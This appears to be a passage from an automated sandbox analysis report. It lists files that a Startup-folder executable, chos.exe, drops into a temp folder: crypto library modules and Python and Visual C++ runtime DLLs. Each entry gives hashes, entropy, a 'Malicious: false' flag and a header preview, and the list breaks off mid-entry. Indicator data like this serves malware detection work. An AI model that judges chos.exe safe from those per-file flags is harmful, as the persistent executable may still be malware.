Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA384.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.837887867708438
Encrypted:	false
SSDEEP:	768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
MD5:	999D431197D7E06A30E0810F1F910B9A
SHA1:	9BFF781221BCFFD8E55485A08627EC2A37363C96
SHA-256:	AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
SHA-512:	A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA512.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.895310340516013
Encrypted:	false
SSDEEP:	768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
MD5:	0931ABBF3AED459B1A2138B551B1D3BB
SHA1:	9EC0296DDAF574A89766A2EC035FC30073863AB0
SHA-256:	1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
SHA-512:	9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.967737129255606
Encrypted:	false
SSDEEP:	192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
MD5:	5F057A380BACBA4EF59C0611549C0E02
SHA1:	4B758D18372D71F0AA38075F073722A55B897F71
SHA-256:	BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
SHA-512:	E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.007867576025166
Encrypted:	false
SSDEEP:	192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
MD5:	49BCA1B7DF076D1A550EE1B7ED3BD997
SHA1:	47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
SHA-256:	49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
SHA-512:	8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_keccak.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.226023387740053
Encrypted:	false
SSDEEP:	384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
MD5:	CB5CFDD4241060E99118DEEC6C931CCC
SHA1:	1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
SHA-256:	A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
SHA-512:	8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_poly1305.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.262055670423592
Encrypted:	false
SSDEEP:	192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
MD5:	18D2D96980802189B23893820714DA90
SHA1:	5DEE494D25EB79038CBC2803163E2EF69E68274C
SHA-256:	C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
SHA-512:	0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..\|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..\|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Math\_modexp.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.913843738203007
Encrypted:	false
SSDEEP:	384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
MD5:	EF472BA63FD22922CA704B1E7B95A29E
SHA1:	700B68E7EF95514D5E94D3C6B10884E1E187ACD8
SHA-256:	66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
SHA-512:	DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..\|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.735350805948923
Encrypted:	false
SSDEEP:	192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
MD5:	3B1CE70B0193B02C437678F13A335932
SHA1:	063BFD5A32441ED883409AAD17285CE405977D1F
SHA-256:	EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
SHA-512:	0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve25519.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	5.705606408072877
Encrypted:	false
SSDEEP:	384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
MD5:	FF33C306434DEC51D39C7BF1663E25DA
SHA1:	665FCF47501F1481534597C1EAC2A52886EF0526
SHA-256:	D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
SHA-512:	66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve448.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.0189903352673655
Encrypted:	false
SSDEEP:	1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
MD5:	F267BF4256F4105DAD0D3E59023011ED
SHA1:	9BC6CA0F375CE49D5787C909D290C07302F58DA6
SHA-256:	1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
SHA-512:	A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ec_ws.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	770560
Entropy (8bit):	7.613224993327352
Encrypted:	false
SSDEEP:	12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
MD5:	1EFD7F7CB1C277416011DE6F09C355AF
SHA1:	C0F97652AC2703C325AB9F20826A6F84C63532F2
SHA-256:	AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
SHA-512:	2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed25519.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26112
Entropy (8bit):	5.8551858881598795
Encrypted:	false
SSDEEP:	384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
MD5:	C5FB377F736ED731B5578F57BB765F7A
SHA1:	5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
SHA-256:	32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
SHA-512:	D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed448.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	6.064677498000638
Encrypted:	false
SSDEEP:	1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
MD5:	8A0C0AA820E98E83AC9B665A9FD19EAF
SHA1:	6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
SHA-256:	4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
SHA-512:	52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.675380950473425
Encrypted:	false
SSDEEP:	96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
MD5:	44B930B89CE905DB4716A548C3DB8DEE
SHA1:	948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
SHA-256:	921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
SHA-512:	79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..\|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.625428549874022
Encrypted:	false
SSDEEP:	96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
MD5:	F24F9356A6BDD29B9EF67509A8BC3A96
SHA1:	A26946E938304B4E993872C6721EB8CC1DCBE43B
SHA-256:	034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
SHA-512:	C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.701724666218339
Encrypted:	false
SSDEEP:	768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
MD5:	68156F41AE9A04D89BB6625A5CD222D4
SHA1:	3BE29D5C53808186EBA3A024BE377EE6F267C983
SHA-256:	82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
SHA-512:	F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......\|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_asyncio.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70928
Entropy (8bit):	6.242470629630265
Encrypted:	false
SSDEEP:	768:FCIB0WWuqkJS86D6rznO6uqM+lY5ZkesIcydIJvn/5YiSyvT2ETh:FCY0WStDwnOLYY5ZkeddIJvnx7Sy75h
MD5:	80083B99812171FEA682B1CF38026816
SHA1:	365FB5B0C652923875E1C7720F0D76A495B0E221
SHA-256:	DBEAE7CB6F256998F9D8DE79D08C74D716D819EB4473B2725DBE2D53BA88000A
SHA-512:	33419B9E18E0099DF37D22E33DEBF15D57F4248346B17423F2B55C8DA7CBE62C19AA0BB5740CFAAC9BC6625B81C54367C0C476EAECE71727439686567F0B1234
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d......g.........." ...).d................................................... ............`.........................................`...P.......d......................../.............T...............................@...............(............................text...)b.......d.................. ..`.rdata...O.......P...h..............@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84240
Entropy (8bit):	6.607563436050078
Encrypted:	false
SSDEEP:	1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
MD5:	CB8C06C8FA9E61E4AC5F22EEBF7F1D00
SHA1:	D8E0DFC8127749947B09F17C8848166BAC659F0D
SHA-256:	FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
SHA-512:	E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_cffi_backend.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	6.189919896183334
Encrypted:	false
SSDEEP:	3072:X3LjFuaTzDGA3GrJwUdoSPhpRv9JUizQWS7LkSTLkKWgFIPXD0:X3QaT3GA3NSPhDsizTikSTLLWgF0z0
MD5:	5CBA92E7C00D09A55F5CBADC8D16CD26
SHA1:	0300C6B62CD9DB98562FDD3DE32096AB194DA4C8
SHA-256:	0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
SHA-512:	7AB432C8774A10F04DDD061B57D07EBA96481B5BB8C663C6ADE500D224C6061BC15D17C74DA20A7C3CEC8BBF6453404D553EBAB22D37D67F9B163D7A15CF1DED
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..#-p.p-p.p-p.p$..p!p.p=.q/p.p=.zp)p.p=.q)p.p=.q%p.p=.q!p.pf..q)p.p9.q.p.p-p.p.p.pe..q)p.p$..p,p.pe..q,p.pe.xp,p.pe..q,p.pRich-p.p........................PE..d..._..f.........." ...).....B......@........................................0............`..........................................h..l....i..................T............ ......0O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...n..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131344
